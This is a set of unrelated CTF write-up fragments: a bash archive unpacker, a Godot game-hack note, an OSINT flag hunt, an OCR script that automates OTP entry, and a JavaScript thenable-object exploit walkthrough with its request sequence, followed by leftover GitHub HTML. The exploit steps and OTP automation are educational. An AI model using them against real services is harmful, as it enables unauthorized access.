Full writeup: [https://mahaloz.re/tasteless-21-tasteless-shores/](https://mahaloz.re/tasteless-21-tasteless-shores/) |
```#!/bin/bash
while [[ true ]]; do if [[ -f flag.txt ]] then file="flag.txt" sign=`xxd flag.txt | head -n 1 | awk '{print $2}'` else file="flag" sign=`xxd flag | head -n 1 | awk '{print $2}'` fi if [[ $sign == "fd37" ]] then mv $file flag.7z p7zip -d flag.7z elif [[ $sign == "1f8b" ]] then mv $file flag.gz gzip -d flag.gz elif [[ $sign == "504b" ]] then mv $file flag.zip unzip flag.zip rm flag.zip elif [[ $sign == "425a" ]] then mv $file flag.bz2 bzip2 -d flag.bz2 else cat flag | base64 -d exit 1 fidone``` |
Aftter discovering the game code is in GDScript, decompile it, and then recompile with edits. Modifying the `player_controller.gd` script, you can give yourself speed, jump, and fly hacks. Fly up to the big skull eye and get the flag. Make sure `FLAG_EYES` is in your `player.markers`.
Full writeup: [https://mahaloz.re/tasteless-21-tasteless-shores/](https://mahaloz.re/tasteless-21-tasteless-shores/) |
# AHF - OSINT
Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01)
Requirements : Know how to Google
(If any of the images aren't loading, please check the original [writeup](https://github.com/csivitu/CTF-Write-ups/tree/master/Deconstruct.f/OSINT/AHF))
---When we open the challenge we are greeted with
>We've been listening and we've heard this group can write decent code (ahem ahem),but what have they been listening to?
The [PDF](https://github.com/csivitu/CTF-Write-ups/blob/master/Deconstruct.f/OSINT/AHF/team.pdf) included pictures of the team "Atom Heart Father" and their names.
We first start up by checking all the user's Spotify (Maybe the flag was in the user's playlist's description) / GitHub (Maybe a project that the team had developed) but that led nowhere.
Finally trying on Youtube gives us Atom Heart Mother as a suggestion which could be a song that they were listening to.


and finally in the comments of [Pink Floyd - Atom Heart Mother Suite (Full Song)](https://www.youtube.com/watch?v=Fku7hi5kI-c) we have

The flag is
```dsc{d0nt_m355_w1th_4t0m_h34rt_f4th3r}``` |
```
import requestsimport cv2import pytesseractfrom PIL import Image, ImageEnhance, ImageFilter
s = requests.Session()contador = 0while True: r = s.get('http://challenge.ctf.games:30753/static/otp.png') file = open(str(contador) + ".png", "wb") file.write(r.content) file.close() image = cv2.imread(str(contador) + ".png") data = pytesseract.image_to_string(image).split('\n')[0] payload = {'otp_entry':data} print(payload) r = s.post('http://challenge.ctf.games:30753/', data=payload) contador = contador + 1 print(r.text) if contador == 45: t = s.get('http://challenge.ctf.games:30753/static/flag.png') file = open("flag.png", "wb") file.write(t.content) file.close()```
|
# TSG CTF 2021 Beginner's Web 2021 Writeup
## Challenge Summary
You are given some converter website.
It is doing some weird job. First, it constructs routes object based on action parameter and store it to the session.
```javascript=const setRoutes = async (session, salt) => { const index = await fs.readFile('index.html');
session.routes = { flag: () => '*** CENSORED ***', index: () => index.toString(), scrypt: (input) => crypto.scryptSync(input, salt, 64).toString('hex'), base64: (input) => Buffer.from(input).toString('base64'), set_salt: async (salt) => { session.routes = await setRoutes(session, salt); session.salt = salt; return 'ok'; }, [salt]: () => salt, };
return session.routes;};```
Then, it will render the page based on the routes object.
```javascript=app.get('/', async (request, reply) => { // omitted
const {action, data} = request.query || {};
let route; switch (action) { case 'Scrypt': route = 'scrypt'; break; case 'Base64': route = 'base64'; break; case 'SetSalt': route = 'set_salt'; break; case 'GetSalt': route = session.salt; break; default: route = 'index'; break; }
reply.type('text/html') return session.routes[route](data);});```
## Solution

The flag is in the `flag` route, so you will want to set `session.salt = 'flag'`, but by doing so, `flag` route will be overwritten by `[salt]` end point and you will lose access to it.
So, what we want to achieve is the following session state.
```javascriptsession = { routes: { flag: ..., index: ..., ... [salt]: ..., // salt is anything different from 'flag' }, salt: 'flag',}```
### 1st request
First, you have to send `GET /?action=SetSalt&data=flag` to set `salt = 'flag'`. The session will be the following structure.
```javascriptsession = { routes: { flag: ..., // this route is overwritten and not accessible index: ..., ... flag: ..., }, salt: 'flag',}```
### 2nd request
Second is the most important part. Now we want to recover `session.routes` so that we can access the `flag` route, but we don't want to update `salt`.
The key is `set_salt` function. Normally, it updates routes and salt together.
```javascript=set_salt: async (salt) => { session.routes = await setRoutes(session, salt); session.salt = salt; return 'ok';},```
What if line 2 is executed but line 3 is NEVER executed? It is possible.
In line 2, we are `await`-ing the execution of `setRoutes` function. Do you know `async`/`await` in ECMAScript is just a syncax sugar of `Promise`? So, we can transform this function to the following equivalent code.
```javascript=set_salt: (salt) => { return setRoutes(session, salt).then((result) => { session.routes = result; session.salt = salt; return 'ok'; });},```
The key is that the code is calling the chained method `then()` from the returned value of `setRoutes` function. What is the return value of this function?
```javascript=const setRoutes = async (session, salt) => { const index = await fs.readFile('index.html');
session.routes = { // omitted [salt]: () => salt, };
return session.routes;};```
It is returning the result of `session.routes`. This is unnecessary since the assignment to `session.route` is already done.
Okay, we can control this value by `salt` parameter. What if we set `salt = 'then'`? It will return the following object.
```javascript{ // omitted then: () => salt,}```
As you can infer from the above code, this `then` method will be called with callback function as an argument. If the function is called, the returned value is considered to be `resolve`-ed and the process continues. But, this `then()` method is just ignoring the argument and the function is never called.
So, by setting `salt = 'then'`, the assignment to `session.routes` happens inside `setRoutes` function, but `setRoute` function is not resolved and the assignment to `session.salt` never happens.
So, send `GET /?action=SetSalt&data=then` to server and this will result in the following session state.
```javascriptsession = { routes: { flag: ..., index: ..., ... then: ..., }, salt: 'flag',}```
This is what we want to achieve!
### 3rd request
Now, just request the salt and it will print the flag!
`GET /?action=GetSalt`
```javascript=return session.routes[route](data); // route = session.salt here```
### Appendix
In technical term, this is called [Thenable Object](https://masteringjs.io/tutorials/fundamentals/thenable).
## Only 1 solve during contest? Why the fuck is this beginner????
Several reasons.
* This challenge does not require experience in CTF. It consists of the combination of some logical errors in the code and knowledge of JavaScript itself.* A member of TSG, who is actually a beginner of CTF, could solve this challenge in just 3 hours.* ~~I thought more people solve this challenge honestly~~ |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" 